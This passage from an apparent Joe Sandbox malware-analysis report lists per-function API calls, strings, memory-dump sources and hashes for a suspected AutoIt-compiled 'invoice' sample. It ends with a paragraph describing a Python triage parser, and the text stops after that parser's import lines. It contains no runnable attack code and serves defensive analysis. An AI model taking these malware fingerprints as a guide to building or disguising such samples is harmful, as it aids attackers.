                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: _wcscmp$__fread_nolock
                        • String ID: FILE
                        • API String ID: 4029003684-3121273764
                        • Opcode ID: 95a025bb7f81bd2e90c5e40ef40cdb6531c43bc260e19e8f698daae84bb97730
                        • Instruction ID: 02c8716250b1b2b675fa7bd41b5a7ba9aa46848955eb2b0112794239d180275e
                        • Opcode Fuzzy Hash: 95a025bb7f81bd2e90c5e40ef40cdb6531c43bc260e19e8f698daae84bb97730
                        • Instruction Fuzzy Hash: 9A41F671A0464ABBDF20AEA1CC85FEFB7BDDF45B10F000469F900E7181DAB99A0497A1
                        APIs
                        • _memset.LIBCMT ref: 00FF26B4
                        • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00FF26EA
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: CrackInternet_memset
                        • String ID: |
                        • API String ID: 1413715105-2343686810
                        • Opcode ID: 0a7d5648a39038e32cb3572aa0250c680d5976827b154c87b8bdee4e7734a311
                        • Instruction ID: 66d0322237dd85400921e8be246cb7eae7990ca8b6cd719a244df4628fd596a8
                        • Opcode Fuzzy Hash: 0a7d5648a39038e32cb3572aa0250c680d5976827b154c87b8bdee4e7734a311
                        • Instruction Fuzzy Hash: C1313971805209AFCF11AFA4CC85EEEBFB9FF08310F100069E904A6166DB359A46EB61
                        APIs
                        • SendMessageW.USER32(?,00001132,00000000,?), ref: 01007B93
                        • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 01007BA8
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: MessageSend
                        • String ID: '
                        • API String ID: 3850602802-1997036262
                        • Opcode ID: 1bd7f005fd7e425a2e2faba3357b50acf509a5c56a525b6e4b4f717e48e0a1f4
                        • Instruction ID: 80b0cfc7f36646538a876d9e8bdaedad8123cd59287d447bd295ed0cf210637d
                        • Opcode Fuzzy Hash: 1bd7f005fd7e425a2e2faba3357b50acf509a5c56a525b6e4b4f717e48e0a1f4
                        • Instruction Fuzzy Hash: BF410C74A017099FEB55CF68C881BDA7BF5FB09300F5001AAEA84AB381D775A941CFA0
                        APIs
                        • DestroyWindow.USER32(?,?,?,?), ref: 01006B49
                        • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 01006B85
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: Window$DestroyMove
                        • String ID: static
                        • API String ID: 2139405536-2160076837
                        • Opcode ID: 614804e1fc0961c218364c2fab4deb9df4ed1735373cd864dfa788c8e3f3411d
                        • Instruction ID: a4c4d29dcf94cc0c8ac04be934eee9b28040b64fbeaed2f47fe251b92e868d29
                        • Opcode Fuzzy Hash: 614804e1fc0961c218364c2fab4deb9df4ed1735373cd864dfa788c8e3f3411d
                        • Instruction Fuzzy Hash: F1317E71100604AEEB12DF68CC80BFB77E9FF48724F108619F9A697190DB35A891DB60
                        APIs
                        • _memset.LIBCMT ref: 00FE2C09
                        • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00FE2C44
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: InfoItemMenu_memset
                        • String ID: 0
                        • API String ID: 2223754486-4108050209
                        • Opcode ID: bce1c841326eb50407538fab8af27a8cff15e653a79b7b90c85476699c18f0e0
                        • Instruction ID: f9037eed5e33226139aa69cada4bf4a5eccf0f46e4c7aa4fdc574a3e68f01000
                        • Opcode Fuzzy Hash: bce1c841326eb50407538fab8af27a8cff15e653a79b7b90c85476699c18f0e0
                        • Instruction Fuzzy Hash: 8D31E571A002899FDB758E5EDD857AEBBBCFB05370F244019E985A61A0F7709A40EB11
                        APIs
                        • __snwprintf.LIBCMT ref: 00FF3B7C
                          • Part of subcall function 00F87F41: _memmove.LIBCMT ref: 00F87F82
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: __snwprintf_memmove
                        • String ID: , $$AUTOITCALLVARIABLE%d
                        • API String ID: 3506404897-2584243854
                        • Opcode ID: 350b1dc35db9466ff4aa996bb6d51750ea9445d0115bc62124dd7ef89fbfc1c3
                        • Instruction ID: 4ea8af3a4c5d47b8e4be251c45b328b9c4e6f0827491ceb7e9cce019dd693db6
                        • Opcode Fuzzy Hash: 350b1dc35db9466ff4aa996bb6d51750ea9445d0115bc62124dd7ef89fbfc1c3
                        • Instruction Fuzzy Hash: 12218031600219ABCF14FFA4CC92EED77A9BF84700F544499F605AB241DB34EA45EBA1
                        APIs
                        • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 01006793
                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0100679E
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: MessageSend
                        • String ID: Combobox
                        • API String ID: 3850602802-2096851135
                        • Opcode ID: eb30f6e081a2723bffaf92acd5aed0639de675b81a3390f3b4f4a64f57dfe2cc
                        • Instruction ID: 55ffc709706c8514582351bdc42a4db03879aafacda70ad7cc06a066ed8fb9b3
                        • Opcode Fuzzy Hash: eb30f6e081a2723bffaf92acd5aed0639de675b81a3390f3b4f4a64f57dfe2cc
                        • Instruction Fuzzy Hash: 561163752001096FFF639E68DC80EAB37ABFB88364F104125F998972D1E6769C6197A0
                        APIs
                          • Part of subcall function 00F81D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00F81D73
                          • Part of subcall function 00F81D35: GetStockObject.GDI32(00000011), ref: 00F81D87
                          • Part of subcall function 00F81D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00F81D91
                        • GetWindowRect.USER32(00000000,?), ref: 01006CA3
                        • GetSysColor.USER32(00000012), ref: 01006CBD
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: Window$ColorCreateMessageObjectRectSendStock
                        • String ID: static
                        • API String ID: 1983116058-2160076837
                        • Opcode ID: 8ec62dfb1a264808893db1fa4355e0e41ad820c78ef3f98484b5295aa9bdbc2b
                        • Instruction ID: 7a772b446c8a47b9ab93b2c60d6e2fdf2066358340ead9311ab64a1dedec0321
                        • Opcode Fuzzy Hash: 8ec62dfb1a264808893db1fa4355e0e41ad820c78ef3f98484b5295aa9bdbc2b
                        • Instruction Fuzzy Hash: B3215C7291020AAFEB15DFA8DC45EFA7BE9FB08304F004629F995D2180D636E861DB50
                        APIs
                        • GetWindowTextLengthW.USER32(00000000), ref: 010069D4
                        • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 010069E3
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: LengthMessageSendTextWindow
                        • String ID: edit
                        • API String ID: 2978978980-2167791130
                        • Opcode ID: 555521e620fb020fb58ea73b8bcfb9dbe4d97d9a1f23e7f9adc8892760a6618d
                        • Instruction ID: 229157cf3861567773518ae83529fca77387c0e5c143946dbfe0f88fe2e3a34d
                        • Opcode Fuzzy Hash: 555521e620fb020fb58ea73b8bcfb9dbe4d97d9a1f23e7f9adc8892760a6618d
                        • Instruction Fuzzy Hash: 38119D71100205ABFB628F78DC40AEB37AEEB05368F504724FAE0975D0C6369CA19760
                        APIs
                        • _memset.LIBCMT ref: 00FE2D1A
                        • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00FE2D39
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: InfoItemMenu_memset
                        • String ID: 0
                        • API String ID: 2223754486-4108050209
                        • Opcode ID: 8fdd00cf2a8f4fa23b9f121e74cfe82cf32b751fe1ab6092b380b087b824a6fc
                        • Instruction ID: 5a352790430bedc4d9498a807e9947ad74ee7a481a23a5e56321c5633afb1ac1
                        • Opcode Fuzzy Hash: 8fdd00cf2a8f4fa23b9f121e74cfe82cf32b751fe1ab6092b380b087b824a6fc
                        • Instruction Fuzzy Hash: 26113872E01254ABDB70DF5DCC84BAD73BDAB06320F140025ED42EB2A0E730AE05E791
                        APIs
                        • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00FF2342
                        • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00FF236B
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: Internet$OpenOption
                        • String ID: <local>
                        • API String ID: 942729171-4266983199
                        • Opcode ID: c1cd9fbb3bc6ca188be269a7045a7d516133837766c5ea8eaa4f2fc93298915c
                        • Instruction ID: dd8a6664522b3b46b3a39b3bb091d5b83249809fade867a57c14bd7b81eae2ad
                        • Opcode Fuzzy Hash: c1cd9fbb3bc6ca188be269a7045a7d516133837766c5ea8eaa4f2fc93298915c
                        • Instruction Fuzzy Hash: 281106B1901229BADB258F128CC9FFBFB6CFF05365F10811AF64996110D3786841E6F1
                        APIs
                          • Part of subcall function 00F87F41: _memmove.LIBCMT ref: 00F87F82
                          • Part of subcall function 00FDAEA4: GetClassNameW.USER32(?,?,000000FF), ref: 00FDAEC7
                        • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00FD9135
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: ClassMessageNameSend_memmove
                        • String ID: ComboBox$ListBox
                        • API String ID: 372448540-1403004172
                        • Opcode ID: a52d3a79182363fe7d803315f82aa9bb7ee2abffc27ec5e2bb88e84f9dc5953e
                        • Instruction ID: 0e7f0ea9169eb9810fa6fcdd889eb1c2f973993d5f3ae8fece056ca2e68f0367
                        • Opcode Fuzzy Hash: a52d3a79182363fe7d803315f82aa9bb7ee2abffc27ec5e2bb88e84f9dc5953e
                        • Instruction Fuzzy Hash: 4501F571A45215ABCB04FBA5CC959FE736AEF0A320B18070AF872573C1DA395808E750
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: __fread_nolock_memmove
                        • String ID: EA06
                        • API String ID: 1988441806-3962188686
                        • Opcode ID: 23a5ab73afa2df8524525983f2f6f7cef6299d6cb463abef030d901de5bdface
                        • Instruction ID: 5bfc7707c5bc7b5050fd4938cc9a08a34edf828c15bd0317135b1a682f5b8fb9
                        • Opcode Fuzzy Hash: 23a5ab73afa2df8524525983f2f6f7cef6299d6cb463abef030d901de5bdface
                        • Instruction Fuzzy Hash: 0701F972C042587EDB28D7A9CC16EEE7BFCDB01701F00459EF556D2181E9B9AA089760
                        APIs
                          • Part of subcall function 00F87F41: _memmove.LIBCMT ref: 00F87F82
                          • Part of subcall function 00FDAEA4: GetClassNameW.USER32(?,?,000000FF), ref: 00FDAEC7
                        • SendMessageW.USER32(?,00000180,00000000,?), ref: 00FD902D
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: ClassMessageNameSend_memmove
                        • String ID: ComboBox$ListBox
                        • API String ID: 372448540-1403004172
                        • Opcode ID: d71d474ab7fb6960750a5005d0d3bfa1f0b41bb3ba60776d9df7591c88f78960
                        • Instruction ID: 89c4d30fc9a24b1c278fdd93bae56de86bc76d3a51c92fa67aa85b96dda5de94
                        • Opcode Fuzzy Hash: d71d474ab7fb6960750a5005d0d3bfa1f0b41bb3ba60776d9df7591c88f78960
                        • Instruction Fuzzy Hash: FD01F771A452046BCB14F7A1CC96EFE73ADDF05740F28011AB84267381DE299E08F3B1
                        APIs
                          • Part of subcall function 00F87F41: _memmove.LIBCMT ref: 00F87F82
                          • Part of subcall function 00FDAEA4: GetClassNameW.USER32(?,?,000000FF), ref: 00FDAEC7
                        • SendMessageW.USER32(?,00000182,?,00000000), ref: 00FD90B0
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: ClassMessageNameSend_memmove
                        • String ID: ComboBox$ListBox
                        • API String ID: 372448540-1403004172
                        • Opcode ID: 5d583e3fda87e663d7988fb5e1a6e15d330ee856f040318bdd19bf2d944ddc8a
                        • Instruction ID: 6ab94441bec831e2d7bad427a6f44c60984905270226731db3f1f5d4d89b6e5f
                        • Opcode Fuzzy Hash: 5d583e3fda87e663d7988fb5e1a6e15d330ee856f040318bdd19bf2d944ddc8a
                        • Instruction Fuzzy Hash: 59012B71A4520467CB14F7B5CC86EFE73AD9F04700F280116780263342DA299E08F3B1
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: ClassName_wcscmp
                        • String ID: #32770
                        • API String ID: 2292705959-463685578
                        • Opcode ID: 0bcba11d74f775b8c1ad3f6bad61865b474f20ddb4c6e64dee5babf8718d4e6a
                        • Instruction ID: 3d47b92e299538f6898d2b5a7a2b584a99562792a0c3961765ad013b79fb53fe
                        • Opcode Fuzzy Hash: 0bcba11d74f775b8c1ad3f6bad61865b474f20ddb4c6e64dee5babf8718d4e6a
                        • Instruction Fuzzy Hash: 17E06872A0032A2BD7309A9AAC09FA7F7ACEB42B30F00005BFD44D3140E661AA0587E1
                        APIs
                          • Part of subcall function 00FBB494: _memset.LIBCMT ref: 00FBB4A1
                          • Part of subcall function 00FA0AC0: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00FBB470,?,?,?,00F8100A), ref: 00FA0AC5
                        • IsDebuggerPresent.KERNEL32(?,?,?,00F8100A), ref: 00FBB474
                        • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00F8100A), ref: 00FBB483
                        Strings
                        • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00FBB47E
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                        • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                        • API String ID: 3158253471-631824599
                        • Opcode ID: 2a8da6adbd55f44298814bc1c50409e23fcb604b1c766c6dd6e732e4ad62ad66
                        • Instruction ID: 133ad0f89d478ee1f83337410376f4a4ec55150c361c2840594a4d3fc9331326
                        • Opcode Fuzzy Hash: 2a8da6adbd55f44298814bc1c50409e23fcb604b1c766c6dd6e732e4ad62ad66
                        • Instruction Fuzzy Hash: A1E06DB4200712CFD731DF65E9047827BE4BF00314F018A2DE4C6C6242EBB9E444EBA1
                        APIs
                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 010059D7
                        • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 010059EA
                          • Part of subcall function 00FE52EB: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00FE5363
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: FindMessagePostSleepWindow
                        • String ID: Shell_TrayWnd
                        • API String ID: 529655941-2988720461
                        • Opcode ID: 8214317708142b6f5d0ce12d7482d7055d38a8cab50595ff73265fde803470d5
                        • Instruction ID: d7ffb7b441457352e24de619a885067c21b4cd2eac1e03bad1f5025a9f36425e
                        • Opcode Fuzzy Hash: 8214317708142b6f5d0ce12d7482d7055d38a8cab50595ff73265fde803470d5
                        • Instruction Fuzzy Hash: F5D01231384312B7E679BB719C0FFD77A18BB44F51F00092AB395AA1C4C9FAA900D754
                        APIs
                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 01005A17
                        • PostMessageW.USER32(00000000), ref: 01005A1E
                          • Part of subcall function 00FE52EB: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00FE5363
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: FindMessagePostSleepWindow
                        • String ID: Shell_TrayWnd
                        • API String ID: 529655941-2988720461
                        • Opcode ID: 5d057e93e45a21a35fbfe8258fdfcb4e4331aeeaa9b694ca5d9b8c48bed7f715
                        • Instruction ID: 255802deb0408f1ff2d29867d11ed714e8d8bf645fbe587c14b0c1ca06a68bcf
                        • Opcode Fuzzy Hash: 5d057e93e45a21a35fbfe8258fdfcb4e4331aeeaa9b694ca5d9b8c48bed7f715
                        • Instruction Fuzzy Hash: 5DD0C9313843127BE679AB719C0FF967618AB44B51F00092AB395AA1C4C9EAA9009754
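The function entries above are emitted by the Joe Sandbox IDA plugin as flat bullet lists, which is awkward to triage by eye once a report has hundreds of them. As an added example (not part of the report and not Joe Sandbox code), the following Python parses that layout into per-function records, flags the two AutoIt-related patterns visible in this listing (the AutoIt interpreter runtime string `$AUTOITCALLVARIABLE%d`, and a WM_COMMAND posted to the taskbar window `Shell_TrayWnd`), and groups functions by their `API String ID`. The `SAMPLE` text is constructed from three of the entries above with the report indentation and the hash fields the parser does not use stripped out; the line layout it assumes (an `APIs` header opening each entry, bullet lines, `Similarity` key/value lines) is taken from the listing as rendered here, so a differently formatted export would need the section names adjusted.

```python
import re
from collections import defaultdict, namedtuple
from dataclasses import dataclass, field

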